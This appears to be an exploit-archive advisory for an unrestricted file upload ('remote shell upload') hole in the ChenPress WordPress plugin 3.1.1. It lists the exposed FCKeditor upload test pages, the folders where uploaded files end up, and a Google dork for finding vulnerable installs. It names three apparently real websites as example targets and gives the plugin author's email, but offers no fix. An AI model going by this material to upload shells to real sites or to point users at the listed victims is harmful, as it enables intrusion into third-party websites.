FCKeditor - Uploaders Tests

################################################################################################# # Exploit Title : WordPress ChenPress Plugins 3.1.1 Remote Shell Upload Vulnerability # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 20/12/2018 # Vendor Homepage : wordpress.org ~ groups-beta.google.com/group/ChenPress # Software Download Link : groups.google.com/group/ChenPress/attach/de5f7cc401d8c608/chenpress_3.1.1.zip?part=2 # Script Owner Email : chweifly@gmail.com ~ W. Chen # Tested On : Windows and Linux # Category : WebApps # Version Information : 3.1.1 # Exploit Risk : Medium # Google Dorks : inurl:''/wp-content/plugins/chenpress/'' # Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ] + CWE-434: Unrestricted Upload of File with Dangerous Type # Visit Web Security Blog and Forum : cyberizm.org [ Team ] ~ ayarsecurity.com [ Friend ] ################################################################################################# # Exploit : /wp-content/plugins/chenpress/fckeditor/editor/filemanager/browser/mcpuk/browser.html /wp-content/plugins/chenpress/FCKeditor/editor/filemanager/upload/test.html /wp-content/plugins/chenpress/chenpress/FCKeditor/editor/filemanager/upload/test.html /wp-content/plugins/chenpress/chenpress/FCKeditor/editor/filemanager/browser/default/browser.html /wp-content/plugins/chenpress/chenpress/FCKeditor/editor/filemanager/browser/default/connectors/test.html /wp-content/plugins/chenpress/chenpress/FCKeditor/editor/filemanager/browser/default/frmupload.html /wp-content/plugins/chenpress/chenpress/FCKeditor/editor/filemanager/browser/mcpuk/frmupload.html # Directory File Path : /wp-content/plugins/chenpress/UserFiles/File/..... /wp-content/uploads/..... /wp-content/uploads/[YEAR]/[MONTH]/..... ################################################################################################# Vulnerable File Code : /test.html FCKeditor - Uploaders Tests

Select the "File Uploader" to use:

Custom Uploader URL:

Uploaded File URL:

Post URL:

################################################################################################# # Example Vulnerable Sites => [+] citizennetmom.com/wp-content/plugins/chenpress/chenpress/FCKeditor/editor/filemanager/upload/test.html [+] arqueixal.com/blog/wp-content/plugins/chenpress/fckeditor/editor/filemanager/browser/mcpuk/browser.html [+] ftp.unicauca.edu.co/cuentas/.cuentasbajadas29092009/comunicacionsocial/wp-content/plugins/ chenpress/FCKeditor/editor/filemanager/browser/mcpuk/browser.html ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################